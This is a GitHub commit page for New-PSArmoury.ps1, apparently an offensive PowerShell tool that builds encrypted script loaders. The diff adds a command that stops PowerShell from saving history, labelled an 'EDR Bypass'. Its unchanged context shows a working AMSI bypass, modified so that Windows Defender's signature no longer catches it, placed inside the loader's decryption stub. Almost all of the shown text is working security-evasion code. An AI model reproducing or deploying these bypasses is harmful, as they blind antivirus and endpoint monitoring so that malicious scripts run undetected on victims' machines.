Simple EDR Bypass

Disable PS History - this bypasses some EDR solutions
cfalta · Nov 17, 2018 · 0339991 · 0339991
1 parent 631e8de
commit 0339991
Showing 1 changed file with 2 additions and 0 deletions.
diff --git a/New-PSArmoury.ps1 b/New-PSArmoury.ps1
@@ -184,6 +184,8 @@ function Write-LoaderFile($EncryptedScriptFileObjects)
 $DecryptionStub=@"
 if(`$Password -and `$Salt)
 {
+#EDR Bypass
+Set-PSReadlineOption -HistorySaveStyle SaveNothing
 
 #AMSI Bypass by Matthew Graeber - altered a bit because Windows Defender now has a signature for the original one
 (([Ref].Assembly.gettypes() | where {`$_.Name -like "Amsi*tils"}).GetFields("NonPublic,Static") | where {`$_.Name -like "amsiInit*ailed"}).SetValue(`$null,`$true)